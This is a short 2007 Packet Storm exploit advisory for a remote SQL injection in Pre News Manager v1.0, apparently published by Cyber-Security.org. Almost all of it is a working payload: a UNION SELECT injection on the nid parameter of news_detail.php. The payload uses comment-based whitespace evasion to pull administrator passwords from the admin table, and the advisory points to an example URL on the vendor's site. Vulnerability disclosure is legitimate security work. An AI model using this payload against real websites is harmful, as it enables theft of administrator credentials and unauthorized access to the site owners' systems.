prenews-sql.txt

2007-05-04T00:00:00
ID PACKETSTORM:56456
Type packetstorm
Reporter cyber-security.org
Modified 2007-05-04T00:00:00

Description

                                        
                                            `==============================================  
  
Pre News Manager v1.0 Remote SQL Injection  
  
==============================================  
  
Found: Cyber-Security.org  
  
==============================================  
  
Script site: http://www.preproject.com/news.asp  
  
==============================================  
  
Exploit:  
news_detail.php?nid=-1/**/union/**/select/**/0,1,2,password,4,5,6/**/from/**/admin/*  
  
==============================================  
  
Example: http://www.preproject.com/news%20manager/  
  
==============================================  
  
  
`